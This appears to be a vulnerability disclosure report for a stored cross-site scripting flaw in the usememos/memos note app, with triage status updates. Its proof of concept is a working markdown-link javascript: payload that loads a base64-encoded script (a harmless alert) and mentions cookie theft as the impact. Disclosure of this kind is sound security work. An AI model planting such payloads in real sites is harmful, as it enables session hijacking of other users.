Stored XSS by link markdown in usememos/memos
Valid
Reported on
Jan 5th 2023
Description
The site allows link markdown but does not validate, resulting in XSS.
Proof of Concept
Create new memo with payload
[Click me!](javascript:document.body.innerHTML="<script src='data:text/javascript;base64,YWxlcnQob3JpZ2luKTs='></script>")
Hold Ctrl and click to Click me!
, a alert with content is domain name appear.
Impact
Stored XSS, stole victim cookie...
Occurrences
We are processing your report and will contact the
usememos/memos
team within 24 hours.
4 days ago
We have contacted a member of the
usememos/memos
team and are waiting to hear back
3 days ago
The researcher's credibility has increased: +7
memo.go#L19
has been validated
to join this conversation